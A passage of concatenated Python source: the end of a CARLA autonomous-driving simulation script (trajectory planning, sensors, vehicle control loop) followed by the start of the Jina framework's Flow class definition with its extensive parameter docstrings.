x = output[:,0]*args.max_dist
y = output[:,1]*args.max_dist
theta_a = torch.atan2(ay, ax)
theta_v = torch.atan2(vy, vx)
sign = torch.sign(torch.cos(theta_a-theta_v))
a = torch.mul(torch.norm(output_axy, dim=1), sign.flatten()).unsqueeze(1)
vx = vx.data.cpu().numpy()
vy = vy.data.cpu().numpy()
x = x.data.cpu().numpy()
y = y.data.cpu().numpy()
ax = ax.data.cpu().numpy()
ay = ay.data.cpu().numpy()
a = a.data.cpu().numpy()
trajectory = {'time':plan_time, 'x':x, 'y':y, 'vx':vx, 'vy':vy, 'ax':ax, 'ay':ay, 'a':a}
return trajectory
def make_plan():
global global_img, global_nav, global_pcd, global_plan_time, global_trajectory,start_control
while True:
global_trajectory = get_traj(global_plan_time, global_img, global_nav)
if not start_control:
start_control = True
def main():
global global_nav, global_vel, start_control, global_plan_map, global_vehicle, global_transform, max_steer_angle, global_a, state0, global_collision, global_view_img
client = carla.Client(config['host'], config['port'])
client.set_timeout(config['timeout'])
world = client.load_world('Town01')
weather = carla.WeatherParameters(
cloudiness= 0,
precipitation=0,
sun_altitude_angle= 45,
fog_density = 100,
fog_distance = 0,
fog_falloff = 0,
)
set_weather(world, weather)
# world.set_weather(carla.WeatherParameters.HardRainSunset)
# world.set_weather(carla.WeatherParameters.WetCloudySunset)
# world.set_weather(carla.WeatherParameters.ClearNoon)
blueprint = world.get_blueprint_library()
world_map = world.get_map()
vehicle = add_vehicle(world, blueprint, vehicle_type='vehicle.audi.a2')
global_vehicle = vehicle
# Enables or disables the simulation of physics on this actor.
vehicle.set_simulate_physics(True)
physics_control = vehicle.get_physics_control()
max_steer_angle = np.deg2rad(physics_control.wheels[0].max_steer_angle)
spawn_points = world_map.get_spawn_points()
waypoint_tuple_list = world_map.get_topology()
origin_map = get_map(waypoint_tuple_list)
agent = BasicAgent(vehicle, target_speed=MAX_SPEED)
# prepare map
destination = carla.Transform()
destination.location = world.get_random_location_from_navigation()
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
'callback':image_callback,
},
'camera:view':{
'transform':carla.Transform(carla.Location(x=-3.0, y=0.0, z=6.0), carla.Rotation(pitch=-45)),
'callback':view_image_callback,
},
'collision':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
'callback':collision_callback,
},
}
sm = SensorManager(world, blueprint, vehicle, sensor_dict)
sm.init_all()
# start to plan
plan_thread = threading.Thread(target = make_plan, args=())
while True:
if (global_img is not None) and (global_nav is not None):
plan_thread.start()
break
else:
time.sleep(0.001)
# wait for the first plan result
while not start_control:
time.sleep(0.001)
print('Start to control')
success_cnt = 0
fail_cnt = 0
ctrller = CapacController(world, vehicle, MAX_SPEED)
while True:
# change destination
if close2dest(vehicle, destination):
success_cnt += 1
print('Success:', success_cnt, '\tFail:', fail_cnt, '\t', 100*(success_cnt)/(success_cnt+fail_cnt))
print('Avg speed', sum(speed_list)/len(speed_list))
#destination = get_random_destination(spawn_points)
print('get destination !', time.time())
destination = carla.Transform()
destination.location = world.get_random_location_from_navigation()
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
if global_collision:
fail_cnt += 1
print('Success:', success_cnt, '\tFail:', fail_cnt, '\t', 100*(success_cnt)/(success_cnt+fail_cnt))
print('Avg speed', sum(speed_list)/len(speed_list))
cv2.imwrite('img_log/'+str(time.time())+'.png', copy.deepcopy(global_view_img))
start_point = random.choice(spawn_points)
vehicle.set_transform(start_point)
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
start_waypoint = agent._map.get_waypoint(agent._vehicle.get_location())
end_waypoint = agent._map.get_waypoint(destination.location)
route_trace = agent._trace_route(start_waypoint, end_waypoint)
start_point.rotation = route_trace[0][0].transform.rotation
vehicle.set_transform(start_point)
time.sleep(0.1)
global_collision = False
v = global_vehicle.get_velocity()
a = global_vehicle.get_acceleration()
global_vel = np.sqrt(v.x**2+v.y**2+v.z**2)
global_a = np.sqrt(a.x**2+a.y**2+a.z**2)
control_time = time.time()
dt = control_time - global_trajectory['time']
index = int((dt/args.max_t)//args.dt) + 2
if index > 0.99/args.dt:
continue
control = ctrller.run_step(global_trajectory, index, state0)
vehicle.apply_control(control)
speed_list.append(global_v0)
visualize(global_view_img, global_nav)
#time.sleep(1/60.)
cv2.destroyAllWindows()
sm.close_all()
vehicle.destroy()
if __name__ == '__main__':
main()
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible, JAML
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if False:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connect_to_predecessor: Optional[bool] = False,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 50,
prefetch_on_recv: Optional[int] = 1,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: The number of pre-fetched requests from the client
:param prefetch_on_recv: The number of additional requests to fetch on every receive
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
base_cls = self.__class__
base_cls_name = self.__class__.__name__
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
self.__class__ = type(base_cls_name, (AsyncPostMixin, base_cls), {})
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
parallel: Optional[int] = 1,
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param parallel: The number of parallel peas in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param peas_hosts: The hosts of the peas when parallel greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `parallel>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all parallels, accepted type follows `--uses`
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all parallels, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'pod{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
